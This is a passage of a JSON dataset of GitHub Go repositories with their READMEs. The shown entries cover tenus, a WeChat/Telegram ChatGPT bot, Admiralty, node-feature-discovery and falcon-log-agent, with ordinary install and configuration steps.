tenus.NewLinkFrom(\"eth0\")\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\t// RENAMING AN INTERFACE BY NAME\n\tif err := tenus.RenameInterfaceByName(\"vethPSQSEl\", \"vethNEWNAME\"); err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n}\n```\n\n### VLAN and MAC VLAN interfaces\n\nYou can check out [VLAN](https://gist.github.com/milosgajdos/9f68b1818dca886e9ae8) and [Mac VLAN](https://gist.github.com/milosgajdos/296fb90d076f259a5b0a) examples, too.\n\n### More examples\n\nRepo contains few more code sample in ```examples``` folder so make sure to check them out if you're interested.\n\n## TODO\n\nThis is just a rough beginning of the project which I put together over couple of weeks in my 
free time. I'd like to integrate this into my own Docker fork and test the advanced networking functionality with the core of Docker as opposed to configuring network interfaces from a separate golang program, because advanced networking in Docker was the main motivation for writing this package.\n\n## Documentation\n\nMore in-depth package documentation is available via [godoc](http://godoc.org/github.com/milosgajdos/tenus)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "houko/wechatgpt", "link": "https://github.com/houko/wechatgpt", "tags": ["chatgpt", "wechat", "slack", "golang"], "stars": 537, "description": "wechatgpt golang\u7248 chatgpt\u673a\u5668\u4eba(\u53efdocker\u90e8\u7f72)\uff0c\u76ee\u524d\u652f\u6301wechat\uff0ctelegram", "lang": "Go", "repo_lang": "", "readme": "## \u6b22\u8fce\u4f7f\u7528`wechatgpt`\u667a\u80fd\u673a\u5668\u4eba\uff0cLet's Chat with ChatGPT\n\n\u5982\u679c\u89c9\u5f97\u4e0d\u9519\uff0c\u8bf7\u9ebb\u70e6\u70b9\u4e2a`Star`\uff0c\u975e\u5e38\u611f\u8c22\u3002\uff08\u6700\u65b0\u5df1\u7ecf\u6dfb\u52a0\u4e86docker\u90e8\u7f72\u7684\u65b9\u5f0f\uff09\n\n


\n\n## \u4ed3\u5e93\u5730\u5740\n\nhttps://github.com/houko/wechatgpt\n\n## \u51c6\u5907\u8fd0\u884c\u73af\u5883\n\n```\ngo mod tidy \ncp config/config.yaml.example local/config.yaml\n```\n\n## \u4fee\u6539\u4f60\u7684token\n\n\u6253\u5f00 [openai](https://beta.openai.com/account/api-keys) \u5e76\u6ce8\u518c\u4e00\u4e2a\u8d26\u53f7,\n\u751f\u6210\u4e00\u4e2aapi_key\u5e76\u628aapi_key\u653e\u5230`local/config.yaml`\n\u7684token\u4e0b\uff0c\u8bf7\u770b\u5982\u4e0b\u793a\u4f8b(\u8bf4\u4e86\u662f\u793a\u4f8b\u522b\u8bd5\u4e86,\u5185\u5bb9\u4e71\u5199\u7684\uff0c\u4e5f\u611f\u8c22@\u90a3\u4e9b\u62c5\u5fc3\u6cc4\u6f0fkey\u7684)\uff1a\n\n```\nchatgpt:\n wechat: \u5c0f\u83ab\n token: sk-pKHZD1fLYqXDjjsdsdsdUvIODTT3ssjdfadsJC2gTuqqhTum\n telegram: your telegram token\n```\n\n\u5927\u9646\u7528\u6237\u6ce8\u518c`openai`\u8bf7\u53c2\u8003 [\u6ce8\u518cChatGPT\u8be6\u7ec6\u6307\u5357](https://sms-activate.org/cn/info/ChatGPT)\n\n## \u8fd0\u884cApp\n\n### \u73af\u5883\u53d8\u91cf\n\n| \u53d8\u91cf\u540d | \u503c | \u4f5c\u7528 |\n|----------------|-------------------|------------------|\n| api_key | \"chatgpt\u7684api_key\" | \u5fc5\u586b\u9879 |\n| wechat | \"true\" \u6216\u7f3a\u7701 | \u5982\u679c\u4e3atrue\u5c31\u4f1a\u542f\u52a8\u5fae\u4fe1\u673a\u5668\u4eba |\n| wechat_keyword | \"\u5173\u952e\u5b57\"\u6216\u7f3a\u7701 | \u5982\u679c\u7f3a\u7701\u5219\u53d1\u4efb\u4f55\u6d88\u606f\u673a\u5668\u90fd\u4f1a\u56de\u590d |\n| telegram | telegram\u7684token\u6216\u7f3a\u7701 | \u5982\u679c\u8981\u542f\u52a8tg\u673a\u5668\u4eba\u9700\u8981\u586b\u5199 |\n| tg_keyword | telegram\u89e6\u53d1\u5173\u952e\u5b57\u6216\u7f3a\u7701 | \u5982\u679c\u9700\u8981\u5173\u952e\u5b57\u89e6\u53d1\u5c31\u586b\u5199 |\n| tg_whitelist | telegram\u7684\u89e6\u53d1\u767d\u540d\u5355 | \u767d\u540d\u5355\u4ee5\u5916\u7684\u7528\u6237\u540d\u53d1\u6d88\u606f\u4e0d\u4f1a\u89e6\u53d1 |\n\n```\ngo run main.go\n```\n\n## `Docker` \u65b9\u5f0f\u8fd0\u884c`wechatgpt`\n\n\u8fd0\u884c\u5fae\u4fe1\u667a\u80fd\u673a\u5668\u4eba\u7684\u8bdd\u8fd0\u884c\u4e0b\u9762\u8fd9\u6bb5\u4ee3\u7801\uff0c\u5fae\u4fe1\u767b\u9646\u7684\u5730\u5740\u8bf7\u67e5\u770b\u8fd0\u884c\u65e5\u5fd7`docker logs `\n\n```\ndocker run -d \\\n--name wechatgpt \\\n-e api_key=\"\u4f60\u7684chatgpt api_key\" \\\n-e wechat=\"true\" \\\n-e wechat_keyword=\"\u5fae\u4fe1\u89e6\u53d1\u5173\u952e\u5b57\" \\\nxiaomoinfo/wechatgpt:latest\n\n```\n\n\u8fd0\u884c\u5fae\u4fe1\u667a\u80fd\u673a\u5668\u4eba\u4e0d\u9700\u8981\u4efb\u4f55\u89e6\u53d1\u5173\u952e\u5b57\u8bf7\u8fd0\u884c\u4e0b\u9762\u8fd9\u6bb5\u4ee3\u7801\uff0c\u9002\u5408\u5fae\u4fe1\u5c0f\u53f7\u4e13\u4e1a\u505a\u673a\u5668\u4eba\u7528\uff0c\u5fae\u4fe1\u767b\u9646\u7684\u5730\u5740\u8bf7\u67e5\u770b\u8fd0\u884c\u65e5\u5fd7`docker logs ` \n`\u8b66\u544a\uff1a\u4ee5\u4e0b\u547d\u4ee4\u4f1a\u8ba9\u4efb\u4f55\u6d88\u606f\u90fd\u4f1a\u88ab\u673a\u5668\u4eba\u63a5\u7ba1\uff0c\u5fae\u4fe1\u4e3b\u53f7\u4e0d\u8981\u7528\u4e0b\u9762\u8fd9\u4e2a\u547d\u4ee4`\n\n```\ndocker run -d \\\n--name wechatgpt \\\n-e api_key=\"\u4f60\u7684chatgpt api_key\" \\\n-e wechat=\"true\" \\\nxiaomoinfo/wechatgpt:latest\n\n```\n\n\u8fd0\u884c`telegram`\u667a\u80fd\u673a\u5668\u4eba\u7684\u8bdd\u8fd0\u884c\u4e0b\u9762\u8fd9\u6bb5\u4ee3\u7801\n\n```\ndocker run -d \\\n--name wechatgpt \\\n-e api_key=\"\u4f60\u7684chatgpt api_key\" \\\n-e telegram=\"\u4f60\u7684telegram token\" 
\\\nxiaomoinfo/wechatgpt:latest\n\n```\n\n\u5982\u679c\u8fd0\u884c`telegram`\u667a\u80fd\u673a\u5668\u4eba\u65f6\u53ea\u5e0c\u671b\u6307\u5b9a\u7684\u4eba\u4f7f\u7528\uff0c\u767d\u540d\u5355\u4ee5\u5916\u7684\u4eba\u53d1\u6d88\u606f\u673a\u5668\u4eba\u4e0d\u4f1a\u56de\u590d\n\n```\ndocker run -d \\\n--name wechatgpt \\\n-e api_key=\"\u4f60\u7684chatgpt api_key\" \\\n-e telegram=\"\u4f60\u7684telegram token\" \\\n-e tg_whitelist=\"username1,username2\" \\\nxiaomoinfo/wechatgpt:latest\n\n```\n\n\u5982\u679c\u8fd0\u884c`telegram`\u667a\u80fd\u673a\u5668\u4eba\u65f6\u5e0c\u671b\u5728\u7fa4\u91cc\u56de\u590d\u522b\u4eba\u6d88\u606f\uff0c\u53ef\u4ee5\u6307\u5b9a\u4e00\u4e2a\u5173\u952e\u5b57\u89e6\u53d1\n\n```\ndocker run -d \\\n--name wechatgpt \\\n-e api_key=\"\u4f60\u7684chatgpt api_key\" \\\n-e telegram=\"\u4f60\u7684telegram token\" \\\n-e tg_keyword=\"\u5c0f\u83ab\" \\\nxiaomoinfo/wechatgpt:latest\n\n```\n\n\"drawing\"\n\n### \u5fae\u4fe1\n\n```\nain.go #gosetup\ngo: downloading github.com/eatmoreapple/openwechat v1.2.1\ngo: downloading github.com/sirupsen/logrus v1.6.0\ngo: downloading github.com/spf13/afero v1.9.2\ngo: downloading github.com/pelletier/go-toml/v2 v2.0.5\ngo: downloading golang.org/x/sys v0.0.0-20220908164124-27713097b956\n/private/var/folders/8t/0nvj_2kn4dl517vhbc4rmb9h0000gn/T/GoLand/___go_build_main_go\n\u8bbf\u95ee\u4e0b\u9762\u7f51\u5740\u626b\u63cf\u4e8c\u7ef4\u7801\u767b\u5f55\nhttps://login.weixin.qq.com/qrcode/QedkOe1I4w==\n```\n\n\u4f1a\u81ea\u52a8\u6253\u5f00\u9ed8\u8ba4\u6d4f\u89c8\u5668\uff0c\u5982\u679c\u6ca1\u6709\u6253\u5f00\u4e5f\u53ef\u4ee5\u624b\u52a8\u70b9\u51fb\u4e0a\u9762\u7684\u94fe\u63a5\u6253\u5f00\u4e8c\u7ef4\u7801\u626b\u5fae\u4fe1\n\n```\n2022/12/09 15:15:00 \u767b\u5f55\u6210\u529f\n2022/12/09 15:15:01 RetCode:0 Selector:2\n2022/12/09 15:15:04 RetCode:0 Selector:2\nINFO[0099] 0 \nINFO[0099] 1 \nINFO[0099] 2 \nINFO[0099] 3 \n```\n\n\u767b\u9646\u6210\u529f\u540e\u4f1a\u62c9\u53d6\u5fae\u4fe1\u7684\u597d\u53cb\u548c\u7fa4\u7ec4\n\n### \u5982\u4f55\u4f7f\u7528\n\n\u9ed8\u8ba4\u4e3a`chatgpt`\uff0c\u5982\u679c\u60f3\u8bbe\u7f6e\u5176\u4ed6\u7684\u89e6\u53d1\u65b9\u5f0f\u53ef\u4ee5\u4fee\u6539`local/config.yaml`\u7684wechat\u3002\u6b64\u65f6\uff0c\u5982\u679c\u522b\u4eba\u7ed9\u4f60\u53d1\u6d88\u606f\u5e26\u6709\u5173\u952e\u5b57`chatgpt`\n\uff0c\u4f60\u7684\u5fae\u4fe1\u5c31\u4f1a\u8c03\u7528`chatGPT`AI\u81ea\u52a8\u56de\u590d\u4f60\u7684\u597d\u53cb\u3002\n\u5f53\u7136\uff0c\u5728\u7fa4\u91cc\u4e5f\u662f\u53ef\u4ee5\u7684\u3002\n\n### \u4f7f\u7528\u573a\u666f1\n\n\u522b\u4eba\u7ed9\u4f60\u53d1\u6d88\u606f\u65f6\uff0c\u5982\u679c\u6d88\u606f\u4e2d\u5e26\u6709\u5173\u952e\u5b57\uff0c\u7cfb\u7edf\u5c31\u4f1a\u8c03\u7528AI\u81ea\u52a8\u5e2e\u4f60\u56de\u590d\u6b64\u95ee\u9898\u3002\n\n\"drawing\"\"drawing\"\"drawing\"\n\n### \u4f7f\u7528\u573a\u666f2\n\n\u81ea\u5df1\u7ed9\u81ea\u5df1\u53d1\u6d88\u606f\u65f6\uff0c\u5982\u679c\u6d88\u606f\u4e2d\u5e26\u6709\u5173\u952e\u5b57\uff0c\u7cfb\u7edf\u4f1a\u4e5f\u8c03\u7528AI\u81ea\u52a8\u5e2e\u4f60\u56de\u590d\u6b64\u95ee\u9898\u3002\n\n\"drawing\"\n\n### \u610f\u5916\u4e4b\u559c\n\n\"drawing\" \n\n\u8fd9\u4e0d\u6bd4\u5bf9\u8c61\u6765\u7684\u8d34\u5fc3\uff1f\n\n### telegram\u673a\u5668\u4eba\u4f7f\u7528\u65b9\u5f0f \n \u4fee\u6539 config\u4e0b\u7684 `chatgpt.telegram`\u7684token\u540e\u8fd0\u884c`go run main.go`\u8fdb\u884c\u542f\u52a8\uff0c\u53c2\u8003\u5982\u4e0b\uff1a\n\n```\nchatgpt:\n wechat: \u5c0f\u83ab\n token: sk-pKHZD1fLYyd56sadsdUvIODTT3ssjdfadsJC2gTuqqhTum\n telegram: 
5718911250:AAhRdbdfxzcCFoM_GyI2g9B18S7WbYviQ \n```\n\n`token`\u83b7\u53d6\u65b9\u5f0f\uff0c\u8bf7\u5728telegram\u4e2d\u6dfb\u52a0\u597d\u53cb`@botFather`\u5e76\u6309\u63d0\u793a\u64cd\u4f5c\n\n\"drawing\"\n\n## \u603b\u7ed3\n\n- \u4f60\u53ef\u4ee5\u628a\u5b83\u5f53\u4f5c\u4f60\u7684\u667a\u80fd\u52a9\u7406\uff0c\u5e2e\u52a9\u4f60\u5feb\u901f\u56de\u590d\u6d88\u606f\u3002\n- \u4f60\u53ef\u4ee5\u628a\u5b83\u5f53\u4f5c\u4e00\u4e2a\u667a\u80fd\u673a\u5668\u4eba\uff0c\u9080\u8bf7\u5728\u7fa4\u91cc\u4e4b\u540e\u901a\u8fc7\u5173\u952e\u5b57\u5e2e\u52a9\u5927\u5bb6\u89e3\u7b54\u95ee\u9898\u3002\n- \u4f60\u53ef\u4ee5\u628a\u5b83\u5f53\u4f5c\u4f60\u7684\u667a\u591a\u661f\uff0c\u6709\u4ec0\u4e48\u95ee\u9898\u4e0d\u61c2\u7684\u65f6\u5019\u968f\u65f6\u95ee\u5b83\u3002\n\n## \u53d8\u7238\u7238\u4e8b\u4ef6\n\n\u653e\u5728B\u7ad9\n[\u7528chatgpt\u5199\u4e86\u4e2a\u5fae\u4fe1\u673a\u5668\u4eba\u7ed3\u679c\u53d8\u7238\u7238\u4e86](https://www.bilibili.com/video/BV1B24y1Q7us/)\n\n## \u8d21\u732e\u672c\u4ed3\u5e93\n\n\u5982\u679c\u5927\u5bb6\u6709\u73a9\u7684\u65f6\u5019\u6709\u9047\u5230\u4e00\u4e9b\u5947\u602a\u7684\u5bf9\u8bdd\u53ef\u4ee5\u622a\u56fe\u53d1PR\u5206\u4eab\u7ed9\u5927\u5bb6\u3002\u53e6\u5916\u5bf9\u672c\u9879\u76ee\u6709\u4ec0\u4e48\u60f3\u6cd5\u6216\u8005\u8d21\u732e\u7684\u8bdd\u6b22\u8fce\u63d0[issue](https://github.com/houko/wechatgpt/issues)\n\u6216[pr](https://github.com/houko/wechatgpt/pulls)\n\n## Q&A\n\n### 1. \u8fd4\u56de\u9519\u8bef`invalid_api_key`\n\n\u8fd9\u662f\u56e0\u4e3a`openai`\u7684`API`\n\u9700\u8981\u4ed8\u8d39\uff0c\u4ef7\u683c\u975e\u5e38\u4fbf\u5b9c\u5177\u4f53\u53ef\u4ee5\u5b98\u7f51\u67e5\u770b\u3002\u6309\u7167\u5982\u4e0b\u53c2\u8003\u7ed1\u5b9a\u4e00\u4e0b\u4fe1\u606f\u5361\u5c31\u53ef\u4ee5\u6b63\u5e38\u4f7f\u7528\u4e86\uff0c\u5982\u679c\u8fd8\u662f\u6709\u9519\u5c31\u628a`API Key`\u5220\u6389\u91cd\u65b0\u5efa\u4e00\u4e2a\u3002\n![img.png](screenshots/billing.png)\n\n### 2. Cannot load io/fs: malformed module path \"io/fs\": missing dot in first path element\n\ngolang\u7248\u672c\u592a\u4f4e\uff0c\u9700\u8981`1.16`\u4ee5\u4e0a\uff0c\u67e5\u770b\u65b9\u5f0f\u4e3a`go version`\n\n```\n$ go version\ngo version go1.17.3 linux/amd64\n```\n\n### 3. \u626b\u7801\u767b\u9646\u65f6\u51fa\u73b0\u9519\u8bef FATA\u30100023\u3011write token.json: bad file descriptor\n\n\u5220\u9664\u9879\u76ee\u6839\u76ee\u5f55\u4e0b\u7684`token.json`\u540e\u91cd\u65b0\u626b\u7801\u767b\u9646\u5373\u53ef\n\n### 4. go mod tidy\u65f6connect: connection refused\n\n```\ngo: github.com/eatmoreapple/openwechat@v1.2.1: Get https://proxy.golang.org/github.com/eatmoreapple/openwechat/@v/v1.2.1.mod: dial tcp 142.251.43.17:443:\n```\n\n\u81ea\u8eab\u7f51\u7edc\u73af\u5883\u95ee\u9898\uff0c\u8bf7\u6392\u67e5\u7f51\u7edc\u8bbe\u7f6e\n\n## \u534f\u8bae\n\n[MIT LICENSE](LICENSE)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "admiraltyio/admiralty", "link": "https://github.com/admiraltyio/admiralty", "tags": [], "stars": 536, "description": "A system of Kubernetes controllers that intelligently schedules workloads across clusters.", "lang": "Go", "repo_lang": "", "readme": "# Admiralty\n\n_formerly multicluster-scheduler_\n\nAdmiralty is a system of Kubernetes controllers that intelligently schedules workloads across clusters. It is simple to use and simple to integrate with other tools.\n\nThe documentation hosted at https://admiralty.io/docs/ is sourced from this repository. 
The links below point to the local Markdown files. Use them if you're browsing this repo without Internet access; otherwise, **the [hosted version](https://admiralty.io/docs/) is easier to navigate**.\n\n- [Introduction](docs/introduction.md)\n- [Quick Start](docs/quick_start.md)\n- Concepts\n - [Multi-Cluster Topologies](docs/concepts/topologies.md)\n - [Cross-Cluster Authentication](docs/concepts/authentication.md)\n - [Multi-Cluster Scheduling](docs/concepts/scheduling.md)\n- Operator Guide\n - [Installation](docs/operator_guide/installation.md)\n - [Configuring Authentication](docs/operator_guide/authentication.md)\n - [Configuring Scheduling](docs/operator_guide/scheduling.md)\n- [Contributor Guide](CONTRIBUTING.md)\n- [Release Notes](CHANGELOG.md)\n- API Reference\n - [Helm Chart](charts/multicluster-scheduler/README.md)\n- [License](LICENSE)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kubernetes-sigs/node-feature-discovery", "link": "https://github.com/kubernetes-sigs/node-feature-discovery", "tags": ["kubernetes", "hardware", "feature-detection", "node-labels", "cpuid", "rdt", "k8s-sig-node", "hacktoberfest"], "stars": 537, "description": "Node feature discovery for Kubernetes", "lang": "Go", "repo_lang": "", "readme": "# Node Feature Discovery\n\n[![Go Report Card](https://goreportcard.com/badge/github.com/kubernetes-sigs/node-feature-discovery)](https://goreportcard.com/report/github.com/kubernetes-sigs/node-feature-discovery)\n[![Prow Build](https://prow.k8s.io/badge.svg?jobs=post-node-feature-discovery-push-images)](https://prow.k8s.io/job-history/gs/kubernetes-jenkins/logs/post-node-feature-discovery-push-images)\n[![Prow E2E-Test](https://prow.k8s.io/badge.svg?jobs=postsubmit-node-feature-discovery-e2e-test)](https://prow.k8s.io/job-history/gs/kubernetes-jenkins/logs/postsubmit-node-feature-discovery-e2e-test)\n\nWelcome to Node Feature Discovery \u2013 a Kubernetes add-on for detecting hardware\nfeatures and system configuration!\n\n### See our [Documentation][documentation] for detailed instructions and reference\n\n#### Quick-start \u2013 the short-short version\n\n```bash\n$ kubectl apply -k https://github.com/kubernetes-sigs/node-feature-discovery/deployment/overlays/default?ref=v0.12.1\n namespace/node-feature-discovery created\n customresourcedefinition.apiextensions.k8s.io/nodefeaturerules.nfd.k8s-sigs.io created\n serviceaccount/nfd-master created\n clusterrole.rbac.authorization.k8s.io/nfd-master created\n clusterrolebinding.rbac.authorization.k8s.io/nfd-master created\n configmap/nfd-worker-conf created\n service/nfd-master created\n deployment.apps/nfd-master created\n daemonset.apps/nfd-worker created\n\n$ kubectl -n node-feature-discovery get all\n NAME READY STATUS RESTARTS AGE\n pod/nfd-master-555458dbbc-sxg6w 1/1 Running 0 56s\n pod/nfd-worker-mjg9f 1/1 Running 0 17s\n...\n\n$ kubectl get no -o json | jq .items[].metadata.labels\n {\n \"kubernetes.io/arch\": \"amd64\",\n \"kubernetes.io/os\": \"linux\",\n \"feature.node.kubernetes.io/cpu-cpuid.ADX\": \"true\",\n \"feature.node.kubernetes.io/cpu-cpuid.AESNI\": \"true\",\n...\n\n```\n\n[documentation]: https://kubernetes-sigs.github.io/node-feature-discovery\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "didi/falcon-log-agent", "link": "https://github.com/didi/falcon-log-agent", "tags": [], "stars": 536, "description": 
"\u7528\u4e8e\u76d1\u63a7\u7cfb\u7edf\u7684\u65e5\u5fd7\u91c7\u96c6agent\uff0c\u53ef\u65e0\u7f1d\u5bf9\u63a5open-falcon", "lang": "Go", "repo_lang": "", "readme": "# falcon-log-agent \n\n![log-agent](./pic/logo.png)\n\n[![Build Status](https://img.shields.io/github/stars/didi/falcon-log-agent.svg)](https://github.com/didi/falcon-log-agent)\n[![Build Status](https://img.shields.io/github/forks/didi/falcon-log-agent.svg)](https://github.com/didi/falcon-log-agent)\n[![Build Status](https://img.shields.io/github/license/mashape/apistatus.svg)](https://github.com/didi/falcon-log-agent)\n[![Backers on Open Collective](https://opencollective.com/falcon-log-agent/backers/badge.svg)](#backers) \n[![Sponsors on Open Collective](https://opencollective.com/falcon-log-agent/sponsors/badge.svg)](#sponsors) \n\n# \u76ee\u5f55\n- [\u7b80\u4ecb](#\u7b80\u4ecb)\n- [Feature](#Feature)\n- [\u4ec0\u4e48\u662f\u65e5\u5fd7\u91c7\u96c6](#\u4ec0\u4e48\u662f\u65e5\u5fd7\u91c7\u96c6)\n- [falcon-log-agent\u5982\u4f55\u5de5\u4f5c](#falcon-log-agent\u5982\u4f55\u5de5\u4f5c)\n- [\u9650\u5b9a\u6761\u4ef6](#\u9650\u5b9a\u6761\u4ef6)\n- [\u5f00\u59cb\u4f7f\u7528log-agent](#\u5f00\u59cb\u4f7f\u7528log-agent)\n * [\u6784\u5efa](#)\n * [\u4fee\u6539\u914d\u7f6e\u6587\u4ef6](#)\n * [\u542f\u52a8/\u505c\u6b62\u670d\u52a1](#)\n- [\u57fa\u7840\u914d\u7f6e\u9879](#\u57fa\u7840\u914d\u7f6e\u9879)\n * [\u65e5\u5fd7\u76f8\u5173](#)\n * [worker\u76f8\u5173](#)\n * [\u8d44\u6e90\u9650\u5236](#)\n * [\u7b56\u7565\u76f8\u5173](#)\n * [\u5176\u4ed6](#)\n- [\u91c7\u96c6\u7b56\u7565](#\u91c7\u96c6\u7b56\u7565)\n * [\u6587\u4ef6\u8def\u5f84](#\u6587\u4ef6\u8def\u5f84)\n * [\u65f6\u95f4\u683c\u5f0f](#\u65f6\u95f4\u683c\u5f0f)\n * [\u91c7\u96c6\u89c4\u5219](#\u91c7\u96c6\u89c4\u5219)\n * [\u91c7\u96c6\u5468\u671f](#\u91c7\u96c6\u5468\u671f)\n * [\u91c7\u96c6\u65b9\u5f0f](#\u91c7\u96c6\u65b9\u5f0f)\n * [\u91c7\u96c6\u540d\u79f0](#\u91c7\u96c6\u540d\u79f0)\n * [\u6807\u7b7e](#\u6807\u7b7e)\n * [\u5176\u4ed6](#\u5176\u4ed6)\n- [\u68c0\u9a8c\u65e5\u5fd7\u683c\u5f0f](#\u68c0\u9a8c\u65e5\u5fd7\u683c\u5f0f)\n- [\u81ea\u8eab\u72b6\u6001\u66b4\u9732](#\u81ea\u8eab\u72b6\u6001\u66b4\u9732)\n- [\u81ea\u76d1\u63a7](#\u81ea\u76d1\u63a7)\n\n# \u7b80\u4ecb\nfalcon-log-agent\u662f\u4e00\u4e2a\u5f00\u6e90\u7248\u7684\u65e5\u5fd7\u91c7\u96c6\u5de5\u5177\uff0c\u65e8\u5728\u4ece\u6d41\u5f0f\u7684\u65e5\u5fd7\u4e2d\u6293\u53d6\u3001\u7edf\u8ba1\u65e5\u5fd7\u4e2d\u7684\u7279\u5f81\u4fe1\u606f\u3002\n\n\u83b7\u53d6\u7684\u7279\u5f81\u4fe1\u606f\uff0c\u4e0e\u5f00\u6e90\u7248Open-Falcon\u76d1\u63a7\u7cfb\u7edf\u6253\u901a\u3002\u53ef\u7528\u4e8e\u4e1a\u52a1\u6307\u6807\u7684\u8861\u91cf\u3001\u4e5f\u53ef\u7528\u4e8e\u7a33\u5b9a\u6027\u7684\u5efa\u8bbe\u3002\n\n# Feature\n- **\u51c6\u786e\u53ef\u4f9d\u8d56**\uff1a\u5386\u7ecf\u6ef4\u6ef4\u7ebf\u4e0a\u4e1a\u52a1\u8fd1\u4e00\u5e74\u8003\u9a8c\uff0c\u7edf\u8ba1\u51c6\u786e\u6027\u9ad8\u3002\n- **\u6027\u80fd\u9ad8\u3001\u8d44\u6e90\u6d88\u8017\u53ef\u63a7**\uff1a\u6027\u80fd\u4f18\u5316\u7a0b\u5ea6\u9ad8\uff0c\u5355\u6838\u5355\u7b56\u7565\u53ef\u652f\u6491\u65e5\u5fd7\u5206\u6790:20W\u6761/\u79d2\n- **\u63a5\u5165\u6210\u672c\u4f4e**\uff1a\u5916\u6302\u5f0f\u91c7\u96c6\uff0c\u53ea\u9700\u8981\u6807\u51c6\u5316\u65e5\u5fd7\u5373\u53ef\uff1b\u8f93\u51fa\u6570\u636e\u76f4\u63a5\u5bf9\u63a5open-falcon\u3002\n\n\u9644\uff1a\u6211\u53f8agent\u5347\u7ea7\u524d\u540e\u8d44\u6e90\u5360\u7528\u5bf9\u6bd4\u56fe\n![\u8d44\u6e90\u5bf9\u6bd4\u56fe](./pic/resource.png)\n\n\n# 
\u4ec0\u4e48\u662f\u65e5\u5fd7\u91c7\u96c6\n\u65e5\u5fd7\u91c7\u96c6\uff0c\u662f\u4e00\u79cd\u5916\u6302\u5f0f\u7684\u91c7\u96c6\u3002\u901a\u8fc7\u8bfb\u53d6\u8fdb\u7a0b\u6253\u5370\u7684\u65e5\u5fd7\uff0c\u6765\u8fdb\u884c\u76d1\u63a7\u6570\u636e\u7684\u91c7\u96c6\u4e0e\u6c47\u805a\u8ba1\u7b97\u3002\n\n# falcon-log-agent\u5982\u4f55\u5de5\u4f5c\n\u672cagent\u5373\u65e5\u5fd7\u91c7\u96c6\u573a\u666f\u4e0b\u7684\u5b9e\u65f6\u8ba1\u7b97\u3002\u5b9e\u65f6\u8bfb\u53d6\u6587\u4ef6\u5185\u5bb9\uff0c\u5b9e\u65f6\u8ba1\u7b97\uff0c\u5c06\u8ba1\u7b97\u7ed3\u679c\u76f4\u63a5\u63a8\u9001\u81f3falcon\u3002\n\n# \u9650\u5b9a\u6761\u4ef6\n- **\u8981\u6c42\u65e5\u5fd7\u5fc5\u987b\u5305\u542b\u65f6\u95f4**\uff1a\u4e0d\u5305\u542b\u65f6\u95f4\u7684\u65e5\u5fd7\uff0c\u53ea\u80fd\u6839\u636e\u5f53\u524d\u65f6\u95f4\u7edf\u8ba1\u65e5\u5fd7\u6761\u6570\uff0c\u7ed3\u679c\u975e\u5e38\u4e0d\u51c6\u786e\u3002\n- **\u4e0d\u652f\u6301\u6587\u4ef6\u8f6f\u94fe**\n- **\u65e5\u5fd7\u65f6\u95f4\u5fc5\u987b\u6709\u5e8f**\uff1a\u4e3a\u4e86\u5e94\u5bf9\u65e5\u5fd7\u5ef6\u8fdf\u843d\u76d8\u7b49\uff0cagent\u4f1a\u6839\u636e\u65e5\u5fd7\u7684\u65f6\u95f4\u6765\u5224\u65ad\u67d0\u4e00\u5468\u671f\u7684\u6570\u636e\u662f\u5426\u91c7\u96c6\u5b8c\u6210\uff0c\u5982\u679c\u65e5\u5fd7\u65f6\u95f4\u987a\u5e8f\u9519\u4e71\uff0c\u53ef\u80fd\u5bfc\u81f4\u91c7\u96c6\u4e0d\u51c6\u3002\n\n# \u5f00\u59cb\u4f7f\u7528log-agent\n\n**\u6784\u5efa**\n```\ngo get https://github.com/didi/falcon-log-agent.git && cd $GOPATH:/src/github.com/didi/falcon-log-agent\nmake build\n```\n\n**\u4fee\u6539\u914d\u7f6e\u6587\u4ef6**\n```\n# base config\ncp cfg/dev.cfg cfg/cfg.json\nvim cfg/cfg.json\n\n# strategy config\ncp cfg/strategy.dev.json cfg/strategy.json\nvim cfg/strategy.json\n```\n\n**\u6253\u5305 & \u5b89\u88c5**\n```\nmake pack\nexport WorkDir=\"$HOME/falcon-log-agent\"\nmkdir -p $WorkDir\ntar -xzvf falcon-log-agent.tar.gz -C $WorkDir\ncd $WorkDir\n```\n\n\n**\u542f\u52a8/\u505c\u6b62\u670d\u52a1**\n```\n # start\n./control start\n\n# stop\n./control stop\n\n# status\n./control status\n```\n\n# 
\u57fa\u7840\u914d\u7f6e\u9879\n\u57fa\u7840\u914d\u7f6e\u9879\uff0c\u5373\u7a0b\u5e8f\u672c\u8eab\u7684\u914d\u7f6e\u9879\u3002\u9ed8\u8ba4\u662fcfg/cfg.json\uff0c\u53ef\u4ee5\u901a\u8fc7-c\u53c2\u6570\u6765\u6307\u5b9a\u3002\n\n**\u65e5\u5fd7\u76f8\u5173**\n```\nlog_path\uff1a\u7a0b\u5e8f\u8f93\u51fa\u7684\u65e5\u5fd7\u76ee\u5f55\nlog_level\uff1a\u65e5\u5fd7\u7b49\u7ea7\nlog_rotate_size\uff1a\u65e5\u5fd7\u5207\u5272\u5927\u5c0f\nlog_rotate_num\uff1a\u6309\u914d\u7f6e\u5207\u5272\u4e4b\u540e\uff0c\u4fdd\u7559\u591a\u5c11\u4e2a\u6587\u4ef6\uff0c\u5176\u4ed6\u7684\u6e05\u7406\u6389\n```\n\n**worker\u76f8\u5173**\n```\nworker_num\uff1a\u6bcf\u4e2a\u65e5\u5fd7\u6587\u4ef6\uff0c\u8fdb\u884c\u8ba1\u7b97\u7684\u5e76\u53d1\u6570\nqueue_size\uff1a\u8bfb\u6587\u4ef6\u548c\u8fdb\u884c\u8ba1\u7b97\u4e4b\u95f4\uff0c\u6709\u4e00\u4e2a\u7f13\u51b2\u961f\u5217\uff0c\u5982\u679c\u961f\u5217\u6ee1\u4e86\uff0c\u610f\u5473\u7740\u8ba1\u7b97\u80fd\u529b\u8ddf\u4e0d\u4e0a\uff0c\u5c31\u8981\u4e22\u65e5\u5fd7\u4e86\u3002\u8fd9\u4e2a\u914d\u7f6e\u5c31\u662f\u8fd9\u4e2a\u7f13\u51b2\u961f\u5217\u7684\u5927\u5c0f\u3002\npush_interval\uff1a\u5faa\u73af\u5224\u65ad\u5c06\u8ba1\u7b97\u5b8c\u6210\u7684\u6570\u636e\u63a8\u9001\u81f3\u53